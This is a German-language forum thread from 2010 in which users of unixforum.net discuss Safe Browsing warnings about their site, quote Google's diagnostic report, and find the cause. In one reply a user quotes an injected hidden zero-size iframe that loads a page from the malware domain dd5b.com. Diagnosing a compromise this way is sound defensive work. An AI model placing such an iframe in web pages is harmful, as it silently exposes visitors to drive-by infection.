|
linuxdomination
|
 |
« am: 26. Juli 2010, 06:19:53 » |
|
firefox sagt -> Safe Browsing Diagnostic page for unixforum.net
What is the current listing status for unixforum.net?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 16 pages we tested on the site over the past 90 days, 3 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-07-25, and the last time suspicious content was found on this site was on 2010-07-25.
Malicious software includes 3 exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine.
Malicious software is hosted on 1 domain(s), including dd5b.com/.
This site was hosted on 1 network(s) including AS24900 (IPX).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, unixforum.net did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
* Return to the previous page. * If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
|
|
|
|
|
Gespeichert
|
|
|
|
|
unixforum.net - Der Treffpunkt für UNIX Fans
|
 |
« am: 26. Juli 2010, 06:19:53 » |
|
|
|
|
|
|
Gespeichert
|
|
|
|
Django2
Unix Rookie
Offline
Beiträge: 29
|
 |
« Antworten #1 am: 26. Juli 2010, 08:27:36 » |
|
Selbe hier:
|
|
|
|
|
Gespeichert
|
|
|
|
|
meisterdausi
|
 |
« Antworten #2 am: 26. Juli 2010, 08:36:40 » |
|
Da müsste mal einer der Global-Admins auf der Google-Seite (Webmaster Tools) mal ein Review beantragen. Ich glaube eigentlich nicht, dass hier irgendwelche Schadsoftware in irgendeinem Verzeichnis liegt.
Viele Grüße,
meisterdausi
|
|
|
|
|
Gespeichert
|
|
|
|
|
Fleedwood
|
 |
« Antworten #3 am: 26. Juli 2010, 09:36:29 » |
|
Da müsste mal einer der Global-Admins auf der Google-Seite (Webmaster Tools) mal ein Review beantragen. Ich glaube eigentlich nicht, dass hier irgendwelche Schadsoftware in irgendeinem Verzeichnis liegt.
neulich hat sich ja die "unsere" IP geändert, wer weiß was mit der IP vorher getrieben wurde... Thomas.
|
|
|
|
|
Gespeichert
|
life is too short to spend debugging Intel parts [Van Jacobson]
|
|
|
|
Tschokko
|
 |
« Antworten #4 am: 26. Juli 2010, 09:59:21 » |
|
Hab mit Firefox das gleiche Problem.
Gruß Tschokko
|
|
|
|
|
Gespeichert
|
|
|
|
|
unixforum.net - Der Treffpunkt für UNIX Fans
|
 |
« Antworten #4 am: 26. Juli 2010, 09:59:21 » |
|
|
|
|
|
|
Gespeichert
|
|
|
|
|
Ebbi
|
 |
« Antworten #5 am: 26. Juli 2010, 14:15:42 » |
|
Warum habe ich kein Problem damit? 
|
|
|
|
|
Gespeichert
|
|
|
|
Octane_Suicide
Unix Rookie
Offline
Beiträge: 37
|
 |
« Antworten #6 am: 26. Juli 2010, 14:20:30 » |
|
Hy!
Mein Safari meckert auch...siehe Anhang.
MfG, Michael
|
|
|
|
|
Gespeichert
|
|
|
|
|
Fleedwood
|
 |
« Antworten #7 am: 26. Juli 2010, 14:56:26 » |
|
Warum habe ich kein Problem damit?  man kann das "Feature" ausschalten, was ich prompt getan hab... Thomas.
|
|
|
|
|
Gespeichert
|
life is too short to spend debugging Intel parts [Van Jacobson]
|
|
|
|
Visualev
|
 |
« Antworten #8 am: 26. Juli 2010, 17:29:46 » |
|
Das Problem hatte ich auch erst seit heute und nur unter dem Fuchs!
|
|
|
|
|
Gespeichert
|
|
|
|
|
meisterdausi
|
 |
« Antworten #9 am: 26. Juli 2010, 18:36:38 » |
|
Naja,
dafür läufts ja jetzt selbst mit Fux :-D (ÄÄäähhhhhh Fuchs :-D)
Viele Grüße,
meisterdausi
|
|
|
|
|
Gespeichert
|
|
|
|
|
tassilo
|
 |
« Antworten #10 am: 26. Juli 2010, 20:09:53 » |
|
hmm ich hatte des öfteren probleme das sich mein konqueror auffer arbeit bei unixforum.net aufgehängt hat, aber das gleiche war auch bei sobl.... dachte aber das ist eher ein "pebcak" problem meinerseits...
tassilo
|
|
|
|
|
Gespeichert
|
|
|
|
|
|
|
Ten Little Indyans
|
 |
« Antworten #12 am: 27. Juli 2010, 20:18:24 » |
|
Leute, da ist was faul. NoScript behauptet dd5b.com blockiert zu haben. Diese Domain ist wohl vor gut einer Woche in China registriert worden. Ein Blick in den Seitenquelltext zeigt das Problem. </body></html><IFrAmE sRC=http://xbx.dd5b.com/index.htm wiDth=0 HeiGht=0></ifRaMe>
|
|
|
|
|
Gespeichert
|
|
|
|
|
Fleedwood
|
 |
« Antworten #13 am: 27. Juli 2010, 20:55:04 » |
|
bei mir sagt noscript auch noch was von 51yes.com... und aboutus verrät dann auch China dazu...
Jetzt wäre wirklich ein Cleanup angesagt...
Thomas.
|
|
|
|
« Letzte Änderung: 27. Juli 2010, 21:04:54 von Fleedwood »
|
Gespeichert
|
life is too short to spend debugging Intel parts [Van Jacobson]
|
|
|
chatnick
Unix Rookie
Offline
Beiträge: 26
|
 |
« Antworten #14 am: 28. Juli 2010, 16:06:08 » |
|
Mir ist das heute auch aufgefallen, (google hat gepetzt) aber wieso soll das den so problematisch sein? Wenn dann gibts hier doch bloss Unix-Malware. 
|
|
|
|
|
Gespeichert
|
|
|
|
|